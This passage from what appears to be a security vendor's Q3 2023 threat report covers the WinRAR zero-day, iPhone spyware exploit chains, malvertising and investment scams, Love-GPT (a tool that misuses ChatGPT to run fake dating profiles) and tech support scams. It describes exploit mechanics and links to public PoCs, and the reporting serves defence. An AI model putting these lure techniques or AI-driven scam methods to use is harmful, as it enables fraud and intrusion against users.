<p>This vulnerability was exploited as a zero-day in financially motivated attacks since at least April 2023. The attacks took place on trading forums and consisted of attackers posting exploit archives promising details of novel trading strategies. However, instead of exciting new trading strategies, the archives were used to spread the DarkMe malware (or the Guloader -> Remcos duo in some attacks). This campaign was initially discovered in July by the <a href="https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/" target="_blank" rel="noreferrer noopener">Group-IB Threat Intelligence unit</a>. After reporting the vulnerability to RARLAB, a patched version of WinRAR was released in August.  </p>
<p>Since WinRAR must be updated manually by downloading and installing the patched version, we can expect there will continue to be many users with unpatched versions in the future. While the exploit does require a fair amount of user interaction (not every targeted user will open the archive in WinRAR and double click the lure file), it is quite easy to craft an exploit archive (there is even a public <a href="https://github.com/HDCE-inc/CVE-2023-38831" target="_blank" rel="noreferrer noopener">PoC builder</a> on GitHub), so it is likely that there will be threat actors experimenting with this vulnerability. And indeed, just recently <a href="https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/" target="_blank" rel="noreferrer noopener">Google TAG reported</a> on “multiple government-backed hacking groups” exploiting this vulnerability. Let us therefore use this opportunity to remind the reader not to delay <a href="https://www.rarlab.com/" target="_blank" rel="noreferrer noopener">applying the update</a>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="767" height="255" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/q3_report_winrar.png" alt="" class="wp-image-7841" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/q3_report_winrar.png 767w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/q3_report_winrar-300x100.png 300w" sizes="(max-width: 767px) 100vw, 767px" /><figcaption class="wp-element-caption"><em>An exploit archive opened in a vulnerable version of WinRAR. Double-clicking the PDF file here would execute a malicious batch file located in the folder of the same name. Note that the PDF file does not have its usual icon. This is because there is an extra space appended to the end of the “.pdf” extension.</em></figcaption></figure></div>
<p>In other news, <a href="https://blog.google/threat-analysis-group/0-days-exploited-by-commercial-surveillance-vendor-in-egypt/" target="_blank" rel="noreferrer noopener">Google’s Threat Analysis Group</a> and <a href="https://citizenlab.ca/2023/09/predator-in-the-wires-ahmed-eltantawy-targeted-with-predator-spyware-after-announcing-presidential-ambitions/" target="_blank" rel="noreferrer noopener">Citizen Lab</a> discovered a new in-the-wild zero-day exploit chain for iPhones. This chain started with a WebKit RCE (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-41993" target="_blank" rel="noreferrer noopener">CVE-2023-41993</a>) which was combined with a signature bypass (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-41991" target="_blank" rel="noreferrer noopener">CVE-2023-41991</a>) and ultimately ended with a kernel LPE (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-41992" target="_blank" rel="noreferrer noopener">CVE-2023-41992</a>). Post-exploitation, the chain deployed the Predator implant, known to be developed by the commercial spyware vendor Intellexa. The attackers also used a parallel exploit chain for Android devices, but unfortunately the full details of this chain remain unknown at the time. </p>
<p>As reported by Citizen Lab, one of the targets was former Egyptian MP Ahmed Eltantawy who announced his run for president in 2024. He was targeted through a man-in-the-middle (MitM) injection on plaintext HTTP, through a middlebox located at an ISP-level privileged network position. This essentially allowed the attackers to use a browser exploit with no user interaction required, similarly to how a watering hole or malvertising attack would work. While it is extremely hard to defend against such government-backed attackers, using a secure VPN should mitigate the risk of ISP-level MitM injection. However, note that just a single HTTP request outside the VPN tunnel is all the attackers would need to still be able to inject the exploit. </p>
<p>Finally, in Q3/2023 the BLASTPASS exploit chain that was actively used by the infamous NSO Group to compromise fully patched iPhones in a zero-click manner. BLASTPASS was <a href="https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/" target="_blank" rel="noreferrer noopener">discovered by the Citizen Lab</a>, who found it while helping check the device of a potential mercenary spyware victim. The initial memory corruption vulnerability appears to go by three different CVEs (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-41064" target="_blank" rel="noreferrer noopener">CVE-2023-41064</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-4863" target="_blank" rel="noreferrer noopener">CVE-2023-4863</a>, and <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-5129" target="_blank" rel="noreferrer noopener">CVE-2023-5129</a>), as there was <a href="https://x.com/wdormann/status/1704580087109066776" target="_blank" rel="noreferrer noopener">some</a> <a href="https://www.rezilion.com/blog/rezilion-researchers-uncover-new-details-on-severity-of-google-chrome-zero-day-vulnerability-cve-2023-4863/" target="_blank" rel="noreferrer noopener">confusion</a> at first about who should actually assign the CVE. Nevertheless, the vulnerable code is located in <a href="https://chromium.googlesource.com/webm/libwebp" target="_blank" rel="noreferrer noopener">libwebp</a>, Google’s image rendering library for the WebP format. While this library is very widely used, it is not currently clear what conditions are needed for the vulnerability to be exploitable. There has been some <a href="https://blog.isosceles.com/the-webp-0day/" target="_blank" rel="noreferrer noopener">great research</a> into the root cause of the vulnerability and a <a href="https://github.com/mistymntncop/CVE-2023-4863" target="_blank" rel="noreferrer noopener">public PoC</a> to trigger a heap overflow. However, weaponizing this heap overflow seems like an absurdly difficult feat, so at least for the moment, we do not have to fear this vulnerability being exploited in the wild by less sophisticated attackers. </p>
<p class="has-text-align-right"><em>Jan Vojtěšek, Malware Reseracher</em></p>
<h2 class="wp-block-heading">Web Threats </h2>
<p>Users increasingly depend on the internet in their daily lives, exposing themselves to a growing array of potential risks, like stealing their personal data or financial losses. The rise in activities such as variations of financial scams, dating scams, fake push notifications and phishing threats in general underscores this trend.  </p>
<p>The third quarter of 2023 was a growing quarter for web threats in general. Many types of threats started their growth at the end of the holiday season and this growth only continued in the third quarter. But there are also some exceptions. Let us take a closer look at them. </p>
<h3 class="wp-block-heading">Scams  </h3>
<p><em>A scam is a type of threat that aims to trick users into giving an attacker their personal information or money. We track diverse types of scams which are listed below.</em> </p>
<p>The significant increase in scam threats that we reported in Q2/2023 remained strong in the third quarter. As you can see in the following chart, we even saw a slight resumption of growth in mid-August.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01_Scams_daily_hiits-1024x404.png" alt="" class="wp-image-7866" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01_Scams_daily_hiits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01_Scams_daily_hiits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01_Scams_daily_hiits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01_Scams_daily_hiits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/01_Scams_daily_hiits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Scam risk ratio over the last three quarters</em> </figcaption></figure></div>
<p>In line with the trends observed in Q2, malvertising continues to serve as very strong tools for scammers, thanks to which they spread various categories of scams. This includes popular dating scams, or financial scams for example. These threats have maintained their strong position, but this is not the case with technical support scams. However, we are seeing the use of false reports of viruses being found to exploit them for sales purposes. Additionally, extortion email scams and phishing threats have both witnessed an uptick in popularity.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02_Scams_heatmap-1024x639.png" alt="" class="wp-image-7867" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02_Scams_heatmap-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02_Scams_heatmap-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02_Scams_heatmap-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02_Scams_heatmap-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/02_Scams_heatmap-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio for scam in Q3/2023</figcaption></figure></div>
<p>The countries most at risk of the scam attacks were Serbia, Kosovo, Montenegro, Albania, Croatia. </p>
<p>Countries where there was an increase in risk ratio are for example Japan +19%, Greece +17%, United States +14%, Austria +13%, or Germany +12% </p>
<h3 class="wp-block-heading">Malvertising </h3>
<p>Malvertising is a malicious online advertising technique that involves the distribution of malware through online ads or, in some cases, in conjunction with browser push notifications. Cybercriminals use these seemingly legitimate ads to deliver malware to unsuspecting users’ devices when they click on or interact with the compromised advertisements. </p>
<p>Cybercriminals are smart enough to make their malvertising pop-ups look genuine. Frequently, these fraudulent pop-ups exploit the recognizable antivirus company’s logo. The goal is to convince users they are encountering a legitimate notification from an antivirus provider. These alerts typically display messages that a virus on a computer has been found and that the subscription plan has expired. </p>
<p>Upon clicking these deceptive pop-ups, unsuspecting users may find themselves redirected to a fake website. These fraudulent sites often take the form of straightforward phishing pages, where users are asked to enter personal credit card information under the guise of providing antivirus services. The scam can take many forms.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="595" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image046-1024x595.png" alt="" class="wp-image-7826" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image046-1024x595.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image046-300x174.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image046-768x447.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image046.png 1259w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Various pop-up leading to the same sca</em>m</figcaption></figure></div>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="592" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image048-1024x592.png" alt="" class="wp-image-7827" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image048-1024x592.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image048-300x173.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image048-768x444.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/image048.png 1214w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>A fake alert landing page with push notification pop-ups as an example</em></figcaption></figure></div>
<p>We have warned about malicious push notifications already in previous reports; this quarter is no exception. This method continues to remain popular with scammers as its effectiveness is still considerable, especially on mobile phones. </p>
<p>As you can see in the below chart, the holiday season has ended not just for students but also for threat actors as there is a substantial surge in the volume of threat detections during September. The graph below represents detection of several types of malvertising. Within the month of September, we observed two prominent spikes in malvertising activity.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/05_Malvertising_daily_hiits-1024x404.png" alt="" class="wp-image-7865" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/05_Malvertising_daily_hiits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/05_Malvertising_daily_hiits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/05_Malvertising_daily_hiits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/05_Malvertising_daily_hiits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/05_Malvertising_daily_hiits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Graph illustrating a notable upswing in malvertising activity in Q3/2023</em></figcaption></figure></div>
<p>One of the most common examples of this malvertising was a page that fell into the push notification section that often appeared as part of a redirect chain. This page has multiple variations. The main purpose is to simply convince user to allow push notifications.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="526" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/06_Malvertising_puish_notifications_example-1024x526.png" alt="" class="wp-image-7864" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/06_Malvertising_puish_notifications_example-1024x526.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/06_Malvertising_puish_notifications_example-300x154.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/06_Malvertising_puish_notifications_example-768x394.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/06_Malvertising_puish_notifications_example.png 1516w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>An instance of a website persuading users to grant permission for push notifications</em>.</figcaption></figure></div>
<p>Push notifications can be especially effective on mobile devices, where they can also be disguised as system notifications, such as an unanswered call or a new text message.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="408" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/07_Malvertising_puish_notifications_campaign-1024x408.png" alt="" class="wp-image-7863" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/07_Malvertising_puish_notifications_campaign-1024x408.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/07_Malvertising_puish_notifications_campaign-300x119.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/07_Malvertising_puish_notifications_campaign-768x306.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/07_Malvertising_puish_notifications_campaign.png 1308w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Example of a scam campaign using push notifications</em></figcaption></figure></div>
<p>Push notifications are not the only powerful tool for scammers. We have reported many times that scammers like to use advertising space on popular social networks. This way of promotion is especially dangerous because many users consider their social platforms to be a safe and personal space. Scammers also design their ads to attract attention, often by using catchy text or the faces of famous personalities. Thanks to this, the success rate of these campaigns is quite high. </p>
<p>Another big advantage for scammers utilising social media ads is their ability to precisely target and tailor content to vulnerable users. Consequently, users may find their social media feeds full of these types of ads over time.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="721" height="835" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/08_Musk_1.png" alt="" class="wp-image-7862" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/08_Musk_1.png 721w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/08_Musk_1-259x300.png 259w" sizes="(max-width: 721px) 100vw, 721px" /><figcaption class="wp-element-caption"><em>One adware example leading to a financial scam, which was seen in multiple languages</em>.</figcaption></figure></div>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="661" height="537" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/09_Musk_2.png" alt="" class="wp-image-7861" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/09_Musk_2.png 661w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/09_Musk_2-300x244.png 300w" sizes="(max-width: 661px) 100vw, 661px" /><figcaption class="wp-element-caption"><em>Some scam ads are also found in video form</em></figcaption></figure></div>
<p>These above ad examples are from Facebook. In this case, these ads are part of a single fraudulent financial scam where scammers are trying to trick users into investing in an Elon Musk/Tesla project. After clicking on the ad, the user is redirected to a web page where they are informed about the great benefits and the certainty that this project is profitable.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="675" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/10_Musk_3-1024x675.png" alt="" class="wp-image-7859" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/10_Musk_3-1024x675.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/10_Musk_3-300x198.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/10_Musk_3-768x506.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/10_Musk_3.png 1359w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Landing page supporting claims from social media advertising</em></figcaption></figure></div>
<p>The aim of the scammers in this example is to give the impression of professionalism. Part of the scam is also an appeal to the unrealistic possibility of buying through an ‘automatic robot’ that invests itself and ‘automatically’ earns money. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="829" height="1296" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/11_Musk_4-e1700042996669.png" alt="" class="wp-image-7858" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/11_Musk_4-e1700042996669.png 829w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/11_Musk_4-e1700042996669-192x300.png 192w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/11_Musk_4-e1700042996669-655x1024.png 655w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/11_Musk_4-e1700042996669-768x1201.png 768w" sizes="(max-width: 829px) 100vw, 829px" /><figcaption class="wp-element-caption"><em>Fake BBC News article ad</em></figcaption></figure></div>
<p>These fake sites can take many forms. Often there are variations that mimic the world’s famous media such as BBC News and many others. These ads take advantage of the targeting of ads that social platforms allow them to do; the ads click through to websites that are created for users in individual countries that correspond to popular news sites in those countries. </p>
<p>The landing pages in this campaign also contain a registration form that requires users to enter their contact information. This information is then sent to the scammer, who then contacts the user either by email or, more often, by phone. Then the actual scamming effort is done over the phone. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="681" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/12_Musk_5-1024x681.png" alt="" class="wp-image-7860" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/12_Musk_5-1024x681.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/12_Musk_5-300x200.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/12_Musk_5-768x511.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/12_Musk_5.png 1261w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Example registration form</em></figcaption></figure></div>
<p>After filling out these fraudulent forms, the user can expect a phone call from the fraudsters. The caller subjects the prospective buyer to a thorough questioning, giving the impression that the financial company is checking not only the solvency of the prospective buyer but also their professional and financial knowledge level. The prospective client is then persuaded to install a remote computer access application, in this case, usually AnyDesk. </p>
<p>To help avoid such scams, we strongly advise the following: </p>
<ul>
<li>do not disclose your personal information to people you do not know or cannot authenticate </li>
<li>do not send photocopied personal documents </li>
<li>do not send any printed credit card information </li>
<li>do not give a code that would allow someone to access your computer remotely </li>
<li>if someone is remotely connected to your computer for any reason, do not log into your online banking </li>
<li>do not forward or tell anyone SMS bank authorization codes </li>
<li>do not authorize a payment to a stranger </li>
<li>keep an antivirus program installed on your computer </li>
<li>keep your online banking limits as low as possible and increase them only to the actual need to pay a specific payment </li>
</ul>
<h3 class="wp-block-heading">Dating Scams </h3>
<p><em>Dating scams, also known as romance scams or online dating scams, involve fraudsters deceiving individuals into fake romantic relationships. Scammers adopt fake online identities to gain the victim’s trust, with the goal of obtaining money or enough personal information to commit identity theft.</em> </p>
<p>Dating scams have garnered increased attention from malicious actors due to the ever-growing popularity of online dating platforms. The accessibility and usual anonymity of these websites make them fertile ground for scammers seeking to exploit people’s emotions and vulnerabilities. Bad actors create fake profiles and engage in emotional manipulation, gaining the trust of unsuspecting users before exploiting them financially or emotionally. As people turn to online dating in greater numbers, scammers see a larger pool of potential victims, which encourages them to invest more time and effort into these deceptive schemes. </p>
<p>We observed a significant increase in dating scams during Q3/2023. The risk ratio of becoming a target rose by 34%.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-1024x404.png" alt="" class="wp-image-7828" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1_daily_hits_normalized_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio in Avast’s user base regarding dating scams in Q3/2023</em></figcaption></figure></div>
<p>Dating scams are not confined to specific regions, but they do tend to be more prevalent in countries, such as those in Europe, the United States, Canada, and Australia. This can be attributed to a higher proportion of the population engaging in online dating due to increased internet accessibility and smartphone usage. </p>
<p>As illustrated by the heat map below, the highest risk ratio of getting involved in a dating scam is in Belgium (4.97%), Luxembourg (4.86%), Germany (4.76%), Slovakia (4.74%), and Austria (4.66%). In Canada, the risk ratio is 2.74%, closely followed by the United States with the risk ratio of 2.17%. For Australia, the risk ratio is 2.33%.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-1024x639.png" alt="" class="wp-image-7829" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2_map_2023_Q3-DatingScam-Q3_malware_scam_DatingScam_31_2023-07-01—2023-09-30-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Map showing global risk ratio for dating scams in Q3/2023</em></figcaption></figure></div>
<h4 class="wp-block-heading">Love-GPT </h4>
<p>We have discovered a tool, which we call <a href="https://decoded.avast.io/threatintel/lovegpt-how-single-ladies-looking-for-your-data-upped-their-game-with-chatgpt/" target="_blank" rel="noreferrer noopener">Love-GPT</a>, that provides vast functionality over several different dating platforms, providing the capability to create fake accounts, interact with victims, bypass CAPTCHA, anonymize the access using proxies and browser anonymization tools, and more. The author is also experimenting with ChatGPT, the now-famous text-based generative AI, to provide them with more streamlined and believable texts. Because of that, we decided to name the tool Love-GPT. We have identified 13 different dating and social discovery platforms that the tool interacts with: </p>
<ul>
<li>Ashley Madison  </li>
<li>Badoo  </li>
<li>Bumble  </li>
<li>Craigslist  </li>
<li>DuyenSo  </li>
<li>Facebook Dating  </li>
<li>likeyou.vn  </li>
<li>MeetMe  </li>
<li>OkCupid  </li>
<li>Plenty of Fish (POF)</li>
<li>Tagged  </li>
<li>Tinder  </li>
<li>Zoosk </li>
</ul>
<p>The tool uses ChatGPT API in attempts to streamline the texts. Overall, the tool contains these functionalities leveraging ChatGPT (both finished and under development): </p>
<ul>
<li>Create a fake profile description to be used on the dating platforms </li>
<li>Read the inbox on the dating platform and reply to messages  </li>
<li>Ask for a phone number  </li>
<li>Write a first contact message  </li>
<li>Chat from a template </li>
</ul>
<p>The tool uses “prompt” values in the API requests’ body to generate the output using ChatGPT. In some of the cases, the whole context is provided to guide ChatGPT for the more precise results:</p>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="115" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3_prompt-1024x115.png" alt="" class="wp-image-7830" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3_prompt-1024x115.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3_prompt-300x34.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3_prompt-768x87.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3_prompt.png 1234w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<p>Just for the sake of demonstration, this is what ChatGPT usually returns for similar prompts: </p>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="825" height="278" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4_test_prompt.png" alt="" class="wp-image-7831" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4_test_prompt.png 825w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4_test_prompt-300x101.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4_test_prompt-768x259.png 768w" sizes="(max-width: 825px) 100vw, 825px" /></figure>
<p>This functionality provides an interesting insight into the upcoming trend of using highly believable texts leveraging generative AI and large language models (LLMs). We can already see that tools misusing the generative AI platforms are emerging and this is likely one of the first in-the-wild examples how the bad actors can misuse it. </p>
<p>Love-GPT is written in VB6 and contains many control panels for its operations. In total, the tool contains 58 different application forms. One of such form, essential for the whole toolset, can be found below and it is called Account Control Center.</p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="509" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5_account_control_center-1024x509.png" alt="" class="wp-image-7832" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5_account_control_center-1024x509.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5_account_control_center-300x149.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5_account_control_center-768x382.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5_account_control_center-1536x764.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5_account_control_center-2048x1019.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Account Control Center with a build-in browser</em></figcaption></figure></div>
<p>With this artillery, Love-GPT stays under the radar because no one can effectively distinguish connections coming from this specific tool and other regular users accessing the platforms. If you are interested in more technical details, check out our detailed analysis on <a href="https://decoded.avast.io/threatintel/lovegpt-how-single-ladies-looking-for-your-data-upped-their-game-with-chatgpt/" target="_blank" rel="noreferrer noopener">Decoded</a>. </p>
<h3 class="wp-block-heading">Tech Support Scams </h3>
<p><em>Tech support scam threats involve fraudsters posing as legitimate technical support representatives who attempt to gain remote access to victims’ devices or obtain sensitive personal information, such as credit card or banking details. These scams rely on confidence tricks to gain victims’ trust and often involve convincing them to pay for unnecessary services or purchase expensive gift cards. It is important for internet users to be vigilant and to verify the credentials of anyone claiming to offer technical support services.</em> </p>
<p>The graph below demonstrates that there was no change for Q3. The downward trend from Q2 continued in the following quarter. </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/18_TSS_daily_hits-1024x404.png" alt="" class="wp-image-7868" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/18_TSS_daily_hits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/18_TSS_daily_hits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/18_TSS_daily_hits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/18_TSS_daily_hits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/18_TSS_daily_hits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Graph illustrating a decline from the beginning of the year</em></figcaption></figure></div>
<p>Despite overall downward trend, a notable shift has been observed in the context of detection ratios among different countries. Compared to the previous quarter we have a change in terms of countries with the highest risk ratio. Japan came in second and was surpassed by Germany, Canada saw a big drop when it was surpassed by both the US and Switzerland. </p>
<figure class="wp-block-table aligncenter"><table><tbody><tr><td><strong>Country</strong> </td><td class="has-text-align-center" data-align="center"><strong>Risk ratio</strong> </td></tr><tr><td><strong>Germany</strong> </td><td class="has-text-align-center" data-align="center">1.81% </td></tr><tr><td><strong>Japan</strong> </td><td class="has-text-align-center" data-align="center">1.37% </td></tr><tr><td><strong>United States</strong> </td><td class="has-text-align-center" data-align="center">1.33% </td></tr><tr><td><strong>Switzerland</strong> </td><td class="has-text-align-center" data-align="center">1.19% </td></tr><tr><td><strong>Canada</strong> </td><td class="has-text-align-center" data-align="center">0.99% </td></tr></tbody></table></figure>
<p>Even though we have seen a decline for this threat since the beginning of the year, the tech support scam still remains a global threat. Which is very effective, especially for inexperienced users. </p>
<div class="wp-block-image">
